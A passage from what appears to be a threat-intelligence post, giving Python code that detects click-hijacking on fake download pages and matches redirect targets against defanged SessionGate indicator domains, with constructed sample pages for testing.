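TRUSTED_UPSTREAM = {"github.com", "gitlab.com", "sourceforge.net"}   # assumed
SESSIONGATE_HOSTS = {h.replace("[.]", ".") for h in (
    "appfreshstart[.]com", "appgetonline[.]com", "webinnosetup[.]com",
    "appmakingcenter[.]com", "yourfastcrc[.]com", "mobileversioncrc[.]com",
    "webcrcprove[.]com", "integritycrc[.]com")}
HOOK = re.compile(r"addEventListener\(\s*['\"](?:mousedown|pointerdown|click)['\"]"
                  r"|on(?:mousedown|click)\s*=", re.I)
NAV = re.compile(r"(?:window\.|document\.)?location(?:\.href)?\s*=(?!=)"
                 r"|location\.(?:assign|replace)\(|window\.open\(")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


class PageScan(HTMLParser):
    """Collect anchors (text, href), external script URLs and inline handlers."""
    def __init__(self):
        super().__init__()
        self.anchors, self.scripts, self.inline = [], [], []
        self._a = None
        self._script = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self._a = (a.get("href", ""), [])
            for attr in ("onclick", "onmousedown"):      # inline handler attributes
                if a.get(attr):
                    self.inline.append(f"{attr}={a[attr]}")
        elif tag == "script":
            if a.get("src"):
                self.scripts.append(a["src"])
            else:
                self._script = []

    def handle_data(self, data):
        if self._a:
            self._a[1].append(data)
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._a:
            self.anchors.append(("".join(self._a[1]).strip(), self._a[0]))
            self._a = None
        elif tag == "script" and self._script is not None:
            self.inline.append("".join(self._script))
            self._script = None


def analyze(html, fetched_scripts=None):
    """Return [(finding, detail)]. fetched_scripts maps script URL -> body."""
    page = PageScan()
    page.feed(html)
    fetched = fetched_scripts or {}
    hooks = []   # (origin, code) for every script that hooks clicks and navigates
    for code in page.inline:
        if HOOK.search(code) and NAV.search(code):
            hooks.append(("inline", code))
    for src in page.scripts:
        body = fetched.get(src, "")
        if HOOK.search(body) and NAV.search(body):
            hooks.append((urlparse(src).hostname or src, body))
    findings = []
    for text, href in page.anchors:
        host = urlparse(href).hostname or ""
        if "download" in text.lower() and host in TRUSTED_UPSTREAM and hooks:
            origins = ", ".join(o for o, _ in hooks)
            findings.append(("click_hijack",
                             f"'{text}' points at {host} but handlers from {origins} navigate elsewhere"))
    targets = set()
    for _, code in hooks:
        targets.update(URL_HOST.findall(code))
    hit = sorted(targets & SESSIONGATE_HOSTS)
    if hit:
        findings.append(("tds_ioc", "redirect target matches SessionGate infrastructure: " + ", ".join(hit)))
    return findings


SAMPLE_SCRIPT_URL = "https://d1111111example.cloudfront.net/assets/dl.js"   # constructed
SAMPLE_SCRIPT = """
document.querySelectorAll('a.dl').forEach(function (a) {
  a.addEventListener('mousedown', function (e) {
    e.preventDefault();
    window.location = 'https://appgetonline.com/go?c=' + Date.now();
  });
});
"""
SAMPLE_HTML = f"""<html><body>
<h1>Ghidra - Free Reverse Engineering Suite</h1>
<a class="dl" href="https://github.com/example-org/tool/releases">Download Ghidra</a>
<script src="{SAMPLE_SCRIPT_URL}"></script>
</body></html>"""
BENIGN_HTML = """<html><body>
<a href="https://github.com/example-org/tool/releases">Download Ghidra</a>
<script>console.log('page loaded');</script>
</body></html>"""
```

Hooking on mousedown rather than click is part of why the visible href is misleading: the browser's status bar and a right-click "copy link" both show the GitHub URL, and the navigation happens before the click event the user expects. Run the check only against script bodies you have fetched; an empty body is treated as unknown, not as safe.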
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.